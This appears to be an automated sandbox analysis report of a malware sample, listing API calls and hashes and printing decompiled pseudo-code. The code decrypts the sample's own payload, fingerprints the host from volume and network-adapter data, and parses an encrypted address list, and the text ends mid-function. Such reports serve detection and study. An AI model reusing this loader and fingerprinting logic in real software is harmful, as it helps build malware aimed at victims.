                                                                                                                                                                                                                                                                                                        0x0400459e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040045b3
                                                                                                                                                                                                                                                                                                        0x040045c0
                                                                                                                                                                                                                                                                                                        0x040047d0
                                                                                                                                                                                                                                                                                                        0x040047d7
                                                                                                                                                                                                                                                                                                        0x040047e0
                                                                                                                                                                                                                                                                                                        0x040047e0
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040047d7
                                                                                                                                                                                                                                                                                                        0x040045d6
                                                                                                                                                                                                                                                                                                        0x040045dc
                                                                                                                                                                                                                                                                                                        0x040045e9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040045ef
                                                                                                                                                                                                                                                                                                        0x04004617
                                                                                                                                                                                                                                                                                                        0x0400461f
                                                                                                                                                                                                                                                                                                        0x040047a9
                                                                                                                                                                                                                                                                                                        0x040047b0
                                                                                                                                                                                                                                                                                                        0x040047c0
                                                                                                                                                                                                                                                                                                        0x040047c6
                                                                                                                                                                                                                                                                                                        0x040047c6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04004637
                                                                                                                                                                                                                                                                                                        0x0400463e
                                                                                                                                                                                                                                                                                                        0x04004644
                                                                                                                                                                                                                                                                                                        0x04004660
                                                                                                                                                                                                                                                                                                        0x04004665
                                                                                                                                                                                                                                                                                                        0x0400466d
                                                                                                                                                                                                                                                                                                        0x0400467f
                                                                                                                                                                                                                                                                                                        0x0400468f
                                                                                                                                                                                                                                                                                                        0x04004695
                                                                                                                                                                                                                                                                                                        0x04004695
                                                                                                                                                                                                                                                                                                        0x040046a8
                                                                                                                                                                                                                                                                                                        0x040046c2
                                                                                                                                                                                                                                                                                                        0x040046c8
                                                                                                                                                                                                                                                                                                        0x040046e3
                                                                                                                                                                                                                                                                                                        0x0400470f
                                                                                                                                                                                                                                                                                                        0x0400473b
                                                                                                                                                                                                                                                                                                        0x0400476b
                                                                                                                                                                                                                                                                                                        0x0400473d
                                                                                                                                                                                                                                                                                                        0x04004750
                                                                                                                                                                                                                                                                                                        0x04004750
                                                                                                                                                                                                                                                                                                        0x04004777
                                                                                                                                                                                                                                                                                                        0x0400478f
                                                                                                                                                                                                                                                                                                        0x04004794
                                                                                                                                                                                                                                                                                                        0x0400479c
                                                                                                                                                                                                                                                                                                        0x040046dd
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400479e
                                                                                                                                                                                                                                                                                                        0x0400479e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400479e
                                                                                                                                                                                                                                                                                                        0x0400479c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040046e3
                                                                                                                                                                                                                                                                                                        0x0400466f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400466f
                                                                                                                                                                                                                                                                                                        0x0400461f

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040047F0: GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040047F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040047F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040047F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040047F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040047F0: CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400468F
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2585753175-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                                                        • Instruction ID: c94ea80790bf0b6d8dbf2583483555f7aa9864fa89971da120b97b62dce4532c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92815D74A056189BEB64CF14DC94BAAB7B4AF49306F0091D9E608BB2C1D774ABC1CF54
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E04009D20(intOrPtr _a4, CHAR* _a8, int _a12) {
                                                                                                                                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				char _v292;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v296;
                                                                                                                                                                                                                                                                                                        				char _v404;
                                                                                                                                                                                                                                                                                                        				long _v408;
                                                                                                                                                                                                                                                                                                        				char _v673;
                                                                                                                                                                                                                                                                                                        				char _v676;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v680;
                                                                                                                                                                                                                                                                                                        				long _v684;
                                                                                                                                                                                                                                                                                                        				signed int _v688;
                                                                                                                                                                                                                                                                                                        				short* _v692;
                                                                                                                                                                                                                                                                                                        				signed int _v696;
                                                                                                                                                                                                                                                                                                        				unsigned int _v700;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v704;
                                                                                                                                                                                                                                                                                                        				char _v900;
                                                                                                                                                                                                                                                                                                        				signed int _v904;
                                                                                                                                                                                                                                                                                                        				signed int _v908;
                                                                                                                                                                                                                                                                                                        				int _v912;
                                                                                                                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                                                                                                                        				void* _t74;
                                                                                                                                                                                                                                                                                                        				short** _t76;
                                                                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                                                        					_v12 = 0x20;
                                                                                                                                                                                                                                                                                                        					_v24 = 6;
                                                                                                                                                                                                                                                                                                        					_v684 = 0;
                                                                                                                                                                                                                                                                                                        					_v20 = 0;
                                                                                                                                                                                                                                                                                                        					_v408 = 0;
                                                                                                                                                                                                                                                                                                        					_v16 = 0x19660d;
                                                                                                                                                                                                                                                                                                        					_v296 = 0x3c6ef35f;
                                                                                                                                                                                                                                                                                                        					_v680 = _a4;
                                                                                                                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
                                                                                                                                                                                                                                                                                                        						_v673 = 0;
                                                                                                                                                                                                                                                                                                        						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
                                                                                                                                                                                                                                                                                                        						if(_t71 != 0) {
                                                                                                                                                                                                                                                                                                        							_v688 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        							E04007D20(_t71,  &_v900, 0, 0xc0);
                                                                                                                                                                                                                                                                                                        							_v700 = 0;
                                                                                                                                                                                                                                                                                                        							_t74 = E04009F70( &_v900, 0xc0,  &_v700); // executed
                                                                                                                                                                                                                                                                                                        							if(_t74 != 0) {
                                                                                                                                                                                                                                                                                                        								_v904 = 0;
                                                                                                                                                                                                                                                                                                        								while(_v904 < _v700 >> 2) {
                                                                                                                                                                                                                                                                                                        									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
                                                                                                                                                                                                                                                                                                        									_v904 = _v904 + 1;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v696 = _v684;
                                                                                                                                                                                                                                                                                                        							_v908 = 0;
                                                                                                                                                                                                                                                                                                        							while(_v908 < 4) {
                                                                                                                                                                                                                                                                                                        								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
                                                                                                                                                                                                                                                                                                        								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
                                                                                                                                                                                                                                                                                                        								_v908 = _v908 + 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t76 =  &_v692;
                                                                                                                                                                                                                                                                                                        							__imp__StringFromCLSID(_a4, _t76); // executed
                                                                                                                                                                                                                                                                                                        							_v704 = _t76;
                                                                                                                                                                                                                                                                                                        							if(_v704 >= 0) {
                                                                                                                                                                                                                                                                                                        								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
                                                                                                                                                                                                                                                                                                        								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
                                                                                                                                                                                                                                                                                                        								_v5 = 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__imp__CoTaskMemFree(_v692);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                                                                                                                                        			}





























                                                                                                                                                                                                                                                                                                        0x04009d29
                                                                                                                                                                                                                                                                                                        0x04009d31
                                                                                                                                                                                                                                                                                                        0x04009d4b
                                                                                                                                                                                                                                                                                                        0x04009d52
                                                                                                                                                                                                                                                                                                        0x04009d59
                                                                                                                                                                                                                                                                                                        0x04009d63
                                                                                                                                                                                                                                                                                                        0x04009d6a
                                                                                                                                                                                                                                                                                                        0x04009d74
                                                                                                                                                                                                                                                                                                        0x04009d7b
                                                                                                                                                                                                                                                                                                        0x04009d88
                                                                                                                                                                                                                                                                                                        0x04009da2
                                                                                                                                                                                                                                                                                                        0x04009da8
                                                                                                                                                                                                                                                                                                        0x04009ddd
                                                                                                                                                                                                                                                                                                        0x04009de5
                                                                                                                                                                                                                                                                                                        0x04009deb
                                                                                                                                                                                                                                                                                                        0x04009e03
                                                                                                                                                                                                                                                                                                        0x04009e0b
                                                                                                                                                                                                                                                                                                        0x04009e28
                                                                                                                                                                                                                                                                                                        0x04009e32
                                                                                                                                                                                                                                                                                                        0x04009e34
                                                                                                                                                                                                                                                                                                        0x04009e4f
                                                                                                                                                                                                                                                                                                        0x04009e73
                                                                                                                                                                                                                                                                                                        0x04009e49
                                                                                                                                                                                                                                                                                                        0x04009e49
                                                                                                                                                                                                                                                                                                        0x04009e4f
                                                                                                                                                                                                                                                                                                        0x04009e81
                                                                                                                                                                                                                                                                                                        0x04009e87
                                                                                                                                                                                                                                                                                                        0x04009ea2
                                                                                                                                                                                                                                                                                                        0x04009ecf
                                                                                                                                                                                                                                                                                                        0x04009ee4
                                                                                                                                                                                                                                                                                                        0x04009e9c
                                                                                                                                                                                                                                                                                                        0x04009e9c
                                                                                                                                                                                                                                                                                                        0x04009eec
                                                                                                                                                                                                                                                                                                        0x04009ef7
                                                                                                                                                                                                                                                                                                        0x04009efd
                                                                                                                                                                                                                                                                                                        0x04009f0a
                                                                                                                                                                                                                                                                                                        0x04009f2b
                                                                                                                                                                                                                                                                                                        0x04009f46
                                                                                                                                                                                                                                                                                                        0x04009f4c
                                                                                                                                                                                                                                                                                                        0x04009f4c
                                                                                                                                                                                                                                                                                                        0x04009f57
                                                                                                                                                                                                                                                                                                        0x04009f57
                                                                                                                                                                                                                                                                                                        0x04009de5
                                                                                                                                                                                                                                                                                                        0x04009da2
                                                                                                                                                                                                                                                                                                        0x04009f63

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                                                        • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04009F70: GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                                                        • StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 04009F25
                                                                                                                                                                                                                                                                                                        • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 04009F46
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 04009F57
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                                                                        • Opcode ID: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5e89223982a4db5088977870fe710af53f8bde251be69ccbe6f0708d183867dd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 695139B0A043189FEB25CF50CC88BEAB7B9BB44304F14C2D9E5096A281DB74AB84CF51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04001390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                        				signed char* _v8;
                                                                                                                                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                                                                                                                        				long _v32;
                                                                                                                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                                                                                                                        				signed int _t57;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                                                                                                                        				void* _t107;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t52 = __eax;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                                        					return _t52 | 0xffffffff;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v24 = 0;
                                                                                                                                                                                                                                                                                                        					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
                                                                                                                                                                                                                                                                                                        					_v28 = _t57;
                                                                                                                                                                                                                                                                                                        					if(_v28 != 0) {
                                                                                                                                                                                                                                                                                                        						E04007B70(_v28, _a4, _a8);
                                                                                                                                                                                                                                                                                                        						E04007B70(_v28 + _a8, "====", 4);
                                                                                                                                                                                                                                                                                                        						_t106 = _t104 + 0x18;
                                                                                                                                                                                                                                                                                                        						_v8 = _v28;
                                                                                                                                                                                                                                                                                                        						_v20 = 3;
                                                                                                                                                                                                                                                                                                        						while(_v20 == 3) {
                                                                                                                                                                                                                                                                                                        							_v32 = 0;
                                                                                                                                                                                                                                                                                                        							while(_v32 < 4) {
                                                                                                                                                                                                                                                                                                        								while( *_v8 != 0x3d) {
                                                                                                                                                                                                                                                                                                        									_t76 = E04001500( *_v8 & 0x000000ff);
                                                                                                                                                                                                                                                                                                        									_t106 = _t106 + 4;
                                                                                                                                                                                                                                                                                                        									if(_t76 >= 0) {
                                                                                                                                                                                                                                                                                                        										break;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
                                                                                                                                                                                                                                                                                                        								_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                                                        								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t64 = E04001580( &_v16,  &_v12);
                                                                                                                                                                                                                                                                                                        							_t107 = _t106 + 8;
                                                                                                                                                                                                                                                                                                        							_v20 = _t64;
                                                                                                                                                                                                                                                                                                        							if(_a16 >= _v20) {
                                                                                                                                                                                                                                                                                                        								E04007B70(_a12,  &_v12, _v20);
                                                                                                                                                                                                                                                                                                        								_t106 = _t107 + 0xc;
                                                                                                                                                                                                                                                                                                        								_a12 = _a12 + _v20;
                                                                                                                                                                                                                                                                                                        								_a16 = _a16 - _v20;
                                                                                                                                                                                                                                                                                                        								_v24 = _v24 + _v20;
                                                                                                                                                                                                                                                                                                        								continue;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 0, _v28);
                                                                                                                                                                                                                                                                                                        						return _v24;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					return _t57 | 0xffffffff;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}


















                                                                                                                                                                                                                                                                                                        0x04001390
                                                                                                                                                                                                                                                                                                        0x0400139a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040013b6
                                                                                                                                                                                                                                                                                                        0x040013b6
                                                                                                                                                                                                                                                                                                        0x040013cd
                                                                                                                                                                                                                                                                                                        0x040013d3
                                                                                                                                                                                                                                                                                                        0x040013da
                                                                                                                                                                                                                                                                                                        0x040013f0
                                                                                                                                                                                                                                                                                                        0x04001406
                                                                                                                                                                                                                                                                                                        0x0400140b
                                                                                                                                                                                                                                                                                                        0x04001411
                                                                                                                                                                                                                                                                                                        0x04001414
                                                                                                                                                                                                                                                                                                        0x0400141b
                                                                                                                                                                                                                                                                                                        0x04001425
                                                                                                                                                                                                                                                                                                        0x04001437
                                                                                                                                                                                                                                                                                                        0x0400143d
                                                                                                                                                                                                                                                                                                        0x0400144f
                                                                                                                                                                                                                                                                                                        0x04001454
                                                                                                                                                                                                                                                                                                        0x04001459
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04001461
                                                                                                                                                                                                                                                                                                        0x04001461
                                                                                                                                                                                                                                                                                                        0x0400146e
                                                                                                                                                                                                                                                                                                        0x04001478
                                                                                                                                                                                                                                                                                                        0x04001434
                                                                                                                                                                                                                                                                                                        0x04001434
                                                                                                                                                                                                                                                                                                        0x04001485
                                                                                                                                                                                                                                                                                                        0x0400148a
                                                                                                                                                                                                                                                                                                        0x0400148d
                                                                                                                                                                                                                                                                                                        0x04001496
                                                                                                                                                                                                                                                                                                        0x040014bc
                                                                                                                                                                                                                                                                                                        0x040014c1
                                                                                                                                                                                                                                                                                                        0x040014ca
                                                                                                                                                                                                                                                                                                        0x040014d3
                                                                                                                                                                                                                                                                                                        0x040014dc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040014dc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040014ab
                                                                                                                                                                                                                                                                                                        0x040014f1
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040014f7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040013dc

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 040013C6
                                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 040013CD
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0400149E
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 040014A5
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 040014EA
                                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 040014F1
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                                                                        • String ID: ====
                                                                                                                                                                                                                                                                                                        • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                                                                        • Opcode ID: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                                                        • Instruction ID: c6e28297ba35799b7f22f7dab3aca0fae7ec72587fc4187f79a8e8c8e7655232
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7414CB5D04209EBEB04DFA4C884BEE7BB5FF44309F108619E515BB2D0D735AA45CB92
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                                                                                                                        			E04007970(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t52;
                                                                                                                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t83;
                                                                                                                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                                                                                                                        				void* _t97;
                                                                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                        					_v16 = 0x8c;
                                                                                                                                                                                                                                                                                                        					_v20 = 0x75bc;
                                                                                                                                                                                                                                                                                                        					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v12 = _t50;
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_t72 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                                                        						_t83 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                                        						_t52 = E0400A400(_t83, _t72, _v12, 0x75bc); // executed
                                                                                                                                                                                                                                                                                                        						_t97 = _t96 + 0x10;
                                                                                                                                                                                                                                                                                                        						_v24 = _t52;
                                                                                                                                                                                                                                                                                                        						if(_v24 >= 0x92) {
                                                                                                                                                                                                                                                                                                        							_v28 = _v24 - 0x8c;
                                                                                                                                                                                                                                                                                                        							_t58 = E04008A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0x40130e8, 0x254);
                                                                                                                                                                                                                                                                                                        							_t98 = _t97 + 0x18;
                                                                                                                                                                                                                                                                                                        							if(_t58 != 0) {
                                                                                                                                                                                                                                                                                                        								_v32 = _v12 + 0x8c;
                                                                                                                                                                                                                                                                                                        								_v36 = _v28 / 6;
                                                                                                                                                                                                                                                                                                        								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
                                                                                                                                                                                                                                                                                                        								if(_v40 != 0) {
                                                                                                                                                                                                                                                                                                        									_v48 = 0;
                                                                                                                                                                                                                                                                                                        									while(_v48 < _v36) {
                                                                                                                                                                                                                                                                                                        										_t64 = E04007B70( &_v44, _v48 * 6 + _v32, 4);
                                                                                                                                                                                                                                                                                                        										_push(_v44);
                                                                                                                                                                                                                                                                                                        										L0400B1EC();
                                                                                                                                                                                                                                                                                                        										_v52 = _t64;
